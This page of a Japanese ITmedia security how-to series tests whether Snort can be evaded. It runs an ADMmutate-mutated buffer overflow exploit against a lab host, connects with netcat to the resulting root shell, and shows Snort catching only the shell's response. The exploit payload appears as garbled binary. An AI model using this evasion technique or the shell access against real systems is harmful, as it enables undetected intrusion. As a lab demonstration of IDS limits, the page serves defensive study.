エンタープライズ：セキュリティ How-To - 第6回：IDSからの検知回避は可能か

ADMmutateを利用したアタック

　次に同様のアタックを、ADMmutateを利用して行ってみよう（192.168.1.10 → 192.168.1.4）。

# ./exp-adm 192.168.1.4 2600 T麓沺担]Q[[・FM_・A・・BH姆彎@H店俯4?副・D擢'7T媛楠0廝沽C辨[O/E_送HJKG・P伝QK'NW 肋GFMJ選NZ廸・^・廨?E儺??弭UH?挈鰥ｵ[勇A[K杞W俸@7CZEMKX廢/X杁@`与賎OGEO李幗H善U 憂誘・WC飮T炭7'荘KPW浪ZTLIS・CGY_N^LUDL_芳X?I祐AA傍UO婉VLS覧M朿DH][/@・'朶I'JF[J ]霊沫VTM?77L俣Y彁・GZRHO@XTLN`7C・・FM・MPY輿顛IX・A乏弸JX兩@/弖廡弉CP?R7U宅F 封_有G狼I[・覧辿T蘖XV釘RZA壞ｨR/覧]/邦H邸TT]@Z_弯L��苧S・悍ｨ/U轍MP__梺'俣^ 輿騒LT滔8LTTLHEYﾚ[戴ｫ@G_J'Z檻P狼ﾂFLｶWU佑_`]M[雄梨・柚纏/F櫂VD廳7GT/GAXS`[乏T 'йｲEB｣MC璃XNZ[ﾁ`Z^'Q祐@ﾓMPLPC兢7CC漸K將LQQ[ｮF・F@``ｿ@・XL/WNGUFPU[AH[・M 悠MUﾙFG霸C逼C@・辿IJ^?L卵廾X_]DF橄1・]Z]R・IJ葡_B労KK[IｳO7B'弭善`]庭笵VRG[悄I 朿肘W・E迭VIEPR]C^GG芳忙LFJ遭�VG媚鋳FNZ・[E?/狙DﾖQU邑G霊>SUFN短@・宅=庭0K弼屁H7Z`W謬ｱ@噌JPL檻K聾鱈ﾅ@O''FT/'XPOJR適姆_WR??ﾎ]]亡Q禅T]・N薦@H櫑R嫋A@UTGHV糖 [MT'疋ｮX飮I`転/探I棊W檻猷・・Z[UG噌HBGLJ篭添NP霸瓢JFLQIOﾑF@汳㌻c箔 �*盃O,椶・・祠蓚j約抛・栫p縊n樣q 庭先・帝栫|cR,・約抛uT・%・・溶E函S採般,忍K%・・b鏃e氈 ,R 贍∪ 臧唏抛nF舳隔闃d壌U莓・莓・�p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・慎麓沺担]Q[[・FM_・A・・BH姆彎@H店俯4?副・D 擢'7T媛楠0廝沽C辨[O/E_送HJKG・P伝QK'NW肋GFMJ選NZ廸・^・廨?E儺??弭UH?挈鰥ｵ[勇A[K 杞W俸@7CZEMKX廢/X杁@`与賎OGEO李幗H善U憂誘・WC飮T炭7'荘KPW浪ZTLIS・CGY_N^LUDL_芳X ?I祐AA傍UO婉VLS覧M朿DH][/@・'朶I'JF[J]霊沫VTM?77L俣Y彁・GZRHO@XTLN`7C・・FM・MPY 輿顛IX・A乏弸JX兩@/弖廡弉CP?R7U宅F封_有G狼I[・覧辿T蘖XV釘RZA壞ｨR/覧]/邦H邸TT ]@Z_弯L��苧S・悍ｨ/U轍MP__梺'俣^輿騒LT滔8LTTLHEYﾚ[戴ｫ@G_J'Z檻P狼ﾂFLｶWU 佑_`]M[雄梨・柚纏/F櫂VD廳7GT/GAXS`[乏T'йｲEB｣MC璃XNZ[ﾁ`Z^'Q祐@ﾓMPLPC兢7CC漸K 將LQQ[ｮF・F@``ｿ@・XL/WNGUFPU[AH[・M悠MUﾙFG霸C逼C@・辿IJ^?L卵廾X_]DF橄1・]Z]R ・IJ葡_B労KK[IｳO7B'弭善`]庭笵VRG[悄I朿肘W・E迭VIEPR]C^GG芳忙LFJ遭�VG媚鋳FNZ ・[E?/狙DﾖQU邑G霊>SUFN短@・宅=庭0K弼屁H7Z`W謬ｱ@噌JPL檻K聾鱈ﾅ@O''FT/'XPOJR適姆 _WR??ﾎ]]亡Q禅T]・N薦@H櫑R嫋A@UTGHV賍^@・5倹f・・・1随j#fY1ン5?ヴｼ法末@飽狙I⊿・ンE・・珸帚ｽ��㌻c箔�*盃O,椶・・祠粡j約抛・栫p縊n樣q 庭先・帝栫|cR,・約抛uT・% ・・溶E函S採般,忍K%・・b鏃e氈 ,R贍∪ 臧唏抛nF舳隔闃d壌U莓・莓・�p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・深

　では、アタックが成功したかを確認する。

# nc 192.168.1.4 3879 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys), 4(adm),6(disk),10 (wheel)

　先ほどと同様にアタックが成功し、ポート3879で/bin/shが動作していることが確認できる。サーバ側でもnetstatコマンドで確認してみる。

# netstat -an | grep3879 tcp00 0.0.0.0:38790.0.0.0:* LISTEN

　これでアタックは成功した。同様にSnortのログで、攻撃が検知されているか確認してみよう。すると、netcatコマンドを実行した際のログは検出されているが、アタックそのものの検出はされておらず、Snortの検出を逃れてアタックに成功したことがわかる。

アラートログ

08/17-15:27:58.490734[**] [1:498:3] ATTACK RESPONSES id check returned root [* *] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.4:3879 -> 192.168.1.10:32809

　今回は、例としてのサンプルアプリケーションを利用した検証ではあるが、ADMmutateを用いた攻撃により、Snortでのバッファーオーバーフォロー攻撃検出を回避し、アタックに成功してしまうことが分かる。

3/5

ITmedia エンタープライズ